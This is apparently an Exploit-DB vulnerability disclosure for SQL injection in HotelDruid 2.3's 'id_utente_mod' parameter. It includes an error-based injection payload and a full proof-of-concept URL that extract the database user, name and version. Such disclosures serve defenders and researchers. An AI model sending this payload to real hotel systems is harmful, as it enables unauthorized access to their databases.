SQL Injection in HotelDruid version 2.3

vendor:

Hoteldruid

by:

Sainadh Jamalpur

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Hoteldruid

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: NO

Related CWE: N/A

CPE: hoteldruid

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows x64/ Kali linux x64

2018

SQL Injection in HotelDruid version 2.3

Hoteldruid is an open source program for hotel management (property management software) developed by DigitalDruid.Net. The 'id_utente_mod' parameter is vulnerable to SQL Injection vulnerability.

Mitigation:

Input validation should be done to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: SQL Injection in HotelDruid version 2.3
# Google Dork: N/A
# Date: 9-12-2018
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://www.hoteldruid.com
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: 2.3 (REQUIRED)
# Tested on: Windows x64/ Kali linux x64
# CVE : N/A

Description:
 Hoteldruid is an open source program for hotel management (property
management software) developed by DigitalDruid.Net
Vulnerability Description:
 the "id_utente_mod" parameter is Vulnerable to SQL Injection Vulnerability.
Payload:
1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT
(ELT(5=5,1)))))--  -

Poc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20-